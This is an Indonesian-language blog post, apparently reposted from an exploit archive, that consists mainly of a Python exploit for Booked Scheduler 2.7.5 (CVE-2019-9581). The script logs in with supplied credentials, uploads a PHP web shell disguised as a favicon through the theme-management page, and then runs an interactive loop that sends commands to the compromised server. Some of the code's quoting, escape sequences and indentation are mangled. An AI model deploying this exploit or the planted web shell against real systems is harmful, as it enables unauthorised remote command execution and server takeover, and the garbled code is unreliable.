Penjadwal yang Dipesan 2.7.5 Unggah Shell

  • Whatsapp
Penjadwal yang Dipesan 2.7.5 Unggah Shell
Penjadwal yang Dipesan Unggah Shell

News.nextcloud.asia

Penjadwal yang dipesan versi 2.75 eksploitasi unggahan shell jarak jauh yang diautentikasi.

MD5 | 6d37cb26dd9060c96e1c2773001febd8

# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Vulnerability founder: AkkuS
# Date: 13/12/2021
# Exploit Author: 0sunday
# Vendor Homepage: https://www.bookedscheduler.com/
# Software Link: N/A
# Version: Booked Scheduler 2.7.5
# Tester on: Kali 2021.2
# CVE: CVE-2019-9581

#!/usr/bin/python3

import sys
import requests
from random import randint

def login():
login_payload = {
"email": username,
"password": password,
"login": "submit",
#"language": "en_us"
}

login_req = request.post(
target+"/booked/Web/index.php",
login_payload,
verify=False,
allow_redirects=True
)

if login_req.status_code == 200:
print ("[+] Logged in successfully.")
else:
print ("[-] Wrong credentials !")
exit()

return login_req.text.split('CSRF_TOKEN" value=")[1].split(";")[0].split("/')[0].split('"')[1]

def upload_shell(csrf):

boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))

_headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept-Language": "en-US,en;q=0.5",
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------"+boundary,
"Origin": target,
"Connection": "close",
"Referer": target + "/booked/Web/admin/manage_theme.php?update"

}

data = "-----------------------------"+boundary+"rn"
data += "Content-Disposition: form-data; name="LOGO_FILE"rnnn"
data += "-----------------------------"+boundary+"rn"
data += "Content-Disposition: form-data; name="FAVICON_FILE"; filename="simple_shell.php"rn"
data += "Content-Type: application/x-phprnn"
data += "<?php $o = system($_REQUEST["cmd"]);die?>rnn"
data += "-----------------------------"+boundary+"rn"
data += "Content-Disposition: form-data; name="CSS_FILE"rnnn"
data += "-----------------------------"+boundary+"rn"
data += "Content-Disposition: form-data; name="CSRF_TOKEN"rnn"
data += csrf + "rn"
data += "-----------------------------"+boundary+"--rn"

# In case you need some debugging
_proxies = {
'http': 'http://127.0.0.1:8080'
}

upload_req = request.post(
target+"/booked/Web/admin/manage_theme.php?action=update",
headers = _headers,
data = data
#proxies=_proxies
)

def shell():
shell_req = request.get(target+"/booked/Web/custom-favicon.php")

if shell_req.status_code == 200:

print("[+] Uploaded shell successfully")
print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
else:
print("[-] Shell uploading failed")
exit(1)

print()
cmd = ''
while(cmd != 'exit'):
cmd = input("$ ")
shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd)
print(shell_req.text)

if len(sys.argv) != 4:
print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password")
exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

request = requests.session()

csrf = login()
upload_shell(csrf)
shell()

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.